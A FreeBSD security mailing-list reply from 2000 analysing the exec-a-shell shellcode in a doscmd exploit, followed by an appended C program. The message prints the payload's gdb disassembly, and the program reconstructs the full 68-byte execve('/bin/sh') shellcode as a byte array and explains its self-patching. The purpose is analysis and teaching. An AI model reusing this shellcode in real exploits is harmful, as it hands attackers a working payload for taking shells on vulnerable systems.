From owner-freebsd-security Wed Feb 16 8:42:57 2000
Delivered-To: freebsd-security@freebsd.org
Received: from builder.freebsd.org (builder.FreeBSD.ORG [204.216.27.24]) by hub.freebsd.org (Postfix) with ESMTP id 494C437B50B for ; Wed, 16 Feb 2000 08:42:55 -0800 (PST) (envelope-from hart@iserver.com)
Received: from gatekeeper.veriohosting.com (gatekeeper.veriohosting.com [192.41.0.2]) by builder.freebsd.org (Postfix) with ESMTP id CA933132E0 for ; Wed, 16 Feb 2000 08:42:18 -0800 (PST)
Received: by gatekeeper.veriohosting.com; Wed, 16 Feb 2000 09:42:52 -0700 (MST)
Received: from unknown(192.168.1.109) by gatekeeper.veriohosting.com via smap (V3.1.1) id xma001693; Wed, 16 Feb 00 09:42:24 -0700
Received: (hart@localhost) by anchovy.orem.iserver.com (8.9.3) id JAA66909; Wed, 16 Feb 2000 09:41:39 -0700 (MST)
Date: Wed, 16 Feb 2000 09:41:39 -0700 (MST)
From: Paul Hart
X-Sender: hart@anchovy.orem.iserver.com
To: Brett Glass
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Doscmd
In-Reply-To: <4.2.2.20000215235704.043169d0@localhost>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, 15 Feb 2000, Brett Glass wrote:

> If it relies on doscmd being suid, then it would fail. But
> I have wondered whether control of your descriptor tables would
> let you hack the system. What's in that machine language?

Nothing interesting. Just the standard exec-a-shell code:

(gdb) x/19i 0x80487d7
0x80487d7 <_fini+7>:    jmp    0x80487fc <_fini+44>
0x80487d9 <_fini+9>:    popl   %esi
0x80487da <_fini+10>:   leal   (%esi),%ebx
0x80487dc <_fini+12>:   movl   %ebx,0xb(%esi)
0x80487df <_fini+15>:   xorl   %edx,%edx
0x80487e1 <_fini+17>:   movl   %edx,0x7(%esi)
0x80487e4 <_fini+20>:   movl   %edx,0xf(%esi)
0x80487e7 <_fini+23>:   movl   %edx,0x14(%esi)
0x80487ea <_fini+26>:   movb   %dl,0x19(%esi)
0x80487ed <_fini+29>:   xorl   %eax,%eax
0x80487ef <_fini+31>:   movb   $0x3b,%al
0x80487f1 <_fini+33>:   leal   0xb(%esi),%ecx
0x80487f4 <_fini+36>:   movl   %ecx,%edx
0x80487f6 <_fini+38>:   pushl  %edx
0x80487f7 <_fini+39>:   pushl  %ecx
0x80487f8 <_fini+40>:   pushl  %ebx
0x80487f9 <_fini+41>:   pushl  %eax
0x80487fa <_fini+42>:   jmp    0x8048814 <_fini+68>
0x80487fc <_fini+44>:   call   0x80487d9 <_fini+9>
(gdb) x/1i 0x8048814
0x8048814 <_fini+68>:   lcall  0x407,0x4040404
(gdb) x/19xb 0x8048801
0x8048801 <_fini+49>:   0x2f    0x62    0x69    0x6e    0x2f    0x73    0x68    0x01
0x8048809 <_fini+57>:   0x01    0x01    0x01    0x02    0x02    0x02    0x02    0x03
0x8048811 <_fini+65>:   0x03    0x03    0x03
(gdb)

For what it's worth, there is another so-called "exploit" for FreeBSD on
Packetstorm Security:

http://packetstorm.securify.com/0002-exploits/umount.c

I don't know about you, but my /sbin/umount isn't SUID either. ;-)

Paul Hart

-- 
Paul Robert Hart        ><8> ><8> ><8>        Verio Web Hosting, Inc.
hart@iserver.com        ><8> ><8> ><8>        http://www.iserver.com/

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
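The listing above rewards a closer read, because the 0x01/0x02/0x03/0x04 filler and the odd-looking `lcall 0x407,0x4040404` are exactly what make it working FreeBSD/i386 shellcode. The C program below is an added example, not code from the message or from the doscmd exploit: it reconstructs the 68-byte payload from the gdb listing (the instruction encodings are my reassembly of the mnemonics, since gdb printed only the data bytes), replays the five stores the code performs after `popl %esi`, and checks that the patched image is `execve("/bin/sh", argv, envp)` entered through the FreeBSD syscall gate `lcall $7,$0` with `%eax = 0x3b`. The address 0xbfbfd0c0 is a made-up stand-in for wherever the payload would land on the stack; nothing here executes the payload.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PAYLOAD_LEN     68    /* 0x80487d7 .. 0x804881a inclusive */
#define DATA_OFF        0x2a  /* "/bin/sh" is 42 bytes in; this is what popl %esi yields */
#define SYS_EXECVE_I386 0x3b  /* execve(2) on FreeBSD/i386 */

/* Reconstructed payload (instruction bytes reassembled from the gdb mnemonics). */
static const uint8_t shellcode[PAYLOAD_LEN] = {
    0xeb, 0x23,                   /* jmp  -> the call at the end of the code        */
    0x5e,                         /* popl %esi     : esi = address of the data block */
    0x8d, 0x1e,                   /* leal (%esi),%ebx : ebx = "/bin/sh"              */
    0x89, 0x5e, 0x0b,             /* movl %ebx,0xb(%esi)   argv[0] = path            */
    0x31, 0xd2,                   /* xorl %edx,%edx                                  */
    0x89, 0x56, 0x07,             /* movl %edx,0x7(%esi)   NUL-terminate the path    */
    0x89, 0x56, 0x0f,             /* movl %edx,0xf(%esi)   argv[1] = NULL            */
    0x89, 0x56, 0x14,             /* movl %edx,0x14(%esi)  lcall offset -> 0         */
    0x88, 0x56, 0x19,             /* movb %dl,0x19(%esi)   selector 0x0407 -> 0x0007 */
    0x31, 0xc0,                   /* xorl %eax,%eax                                  */
    0xb0, 0x3b,                   /* movb $0x3b,%al        SYS_execve                */
    0x8d, 0x4e, 0x0b,             /* leal 0xb(%esi),%ecx   ecx = argv                */
    0x89, 0xca,                   /* movl %ecx,%edx        envp = argv               */
    0x52, 0x51, 0x53, 0x50,       /* pushl envp, argv, path, dummy return address    */
    0xeb, 0x18,                   /* jmp  -> the lcall                               */
    0xe8, 0xd8, 0xff, 0xff, 0xff, /* call popl: pushes the address of the data below */
    /* data block; offsets are relative to %esi */
    '/', 'b', 'i', 'n', '/', 's', 'h', 0x01,  /* 0x00-0x07: path, 0x01 stands in for NUL */
    0x01, 0x01, 0x01,                         /* 0x08-0x0a: rest of the dword zeroed      */
    0x02, 0x02, 0x02, 0x02,                   /* 0x0b-0x0e: argv[0], overwritten at run   */
    0x03, 0x03, 0x03, 0x03,                   /* 0x0f-0x12: argv[1], zeroed at run        */
    0x9a, 0x04, 0x04, 0x04, 0x04, 0x07, 0x04, /* 0x13-0x19: lcall 0x407,0x4040404         */
};

static uint32_t get32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static void put32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* NUL bytes in an image.  The payload travels through a string copy, so the
 * untouched payload must contain none; the filler bytes exist for that reason. */
size_t count_nuls(const uint8_t *img, size_t len)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++) n += (img[i] == 0);
    return n;
}

/* Replay the five stores the code performs after popl %esi.  `esi' is the
 * run-time address of the data block, unknown until the payload lands, which
 * is why the code discovers it with call/pop instead of hard-coding it. */
int patch_payload(uint8_t *img, size_t len, uint32_t esi)
{
    if (len < PAYLOAD_LEN) return -1;
    uint8_t *d = img + DATA_OFF;
    put32(d + 0x0b, esi);   /* movl %ebx,0xb(%esi)  */
    put32(d + 0x07, 0);     /* movl %edx,0x7(%esi)  */
    put32(d + 0x0f, 0);     /* movl %edx,0xf(%esi)  */
    put32(d + 0x14, 0);     /* movl %edx,0x14(%esi) */
    d[0x19] = 0;            /* movb %dl,0x19(%esi)  */
    return 0;
}

/* What the kernel sees at the gate: execve("/bin/sh", {"/bin/sh", NULL}, envp)
 * through lcall $7,$0 with %eax = 0x3b.  Returns 1 if the image is in that state. */
int check_patched(const uint8_t *img, uint32_t esi)
{
    static const uint8_t gate[] = { 0x9a, 0x00, 0x00, 0x00, 0x00, 0x07, 0x00 };
    const uint8_t *d = img + DATA_OFF;
    if (memcmp(d, "/bin/sh", 8) != 0) return 0;                  /* includes the NUL */
    if (get32(d + 0x0b) != esi) return 0;                        /* argv[0] -> path  */
    if (get32(d + 0x0f) != 0) return 0;                          /* argv[1] == NULL  */
    if (memcmp(d + 0x13, gate, sizeof gate) != 0) return 0;      /* lcall $7,$0      */
    if (img[24] != 0xb0 || img[25] != SYS_EXECVE_I386) return 0; /* movb $0x3b,%al   */
    return 1;
}

/* Whole sequence on a private copy; `esi' is the assumed landing address. */
int patched_ok(uint32_t esi)
{
    uint8_t img[PAYLOAD_LEN];
    memcpy(img, shellcode, sizeof img);
    return patch_payload(img, sizeof img, esi) == 0 && check_patched(img, esi);
}

size_t nuls_after_patch(uint32_t esi)
{
    uint8_t img[PAYLOAD_LEN];
    memcpy(img, shellcode, sizeof img);
    patch_payload(img, sizeof img, esi);
    return count_nuls(img, sizeof img);
}

int main(void)
{
    uint32_t esi = 0xbfbfd0c0u;  /* constructed stack address for the data block */
    printf("NULs before patch: %zu\n", count_nuls(shellcode, PAYLOAD_LEN));
    printf("NULs after patch:  %zu\n", nuls_after_patch(esi));
    printf("execve(\"/bin/sh\") via lcall $7,$0: %s\n", patched_ok(esi) ? "yes" : "no");
    return 0;
}
```

Two things the decoded image makes plain. First, the 0x01..0x04 bytes are placeholders for zeros that cannot be in the payload while it is being copied as a string, so the code writes them back at run time; the 0x04 bytes inside the `lcall` turn `lcall 0x407,0x4040404` into `lcall $7,$0`, the i386 FreeBSD syscall gate, once `0x14(%esi)` and `0x19(%esi)` are zeroed. Second, the dummy `pushl %eax` matches the FreeBSD convention of a return address slot above the syscall arguments, and `envp` is simply aliased to `argv`, which is fine for a shell. None of this depends on doscmd being setuid; as the message notes, the payload itself is unremarkable.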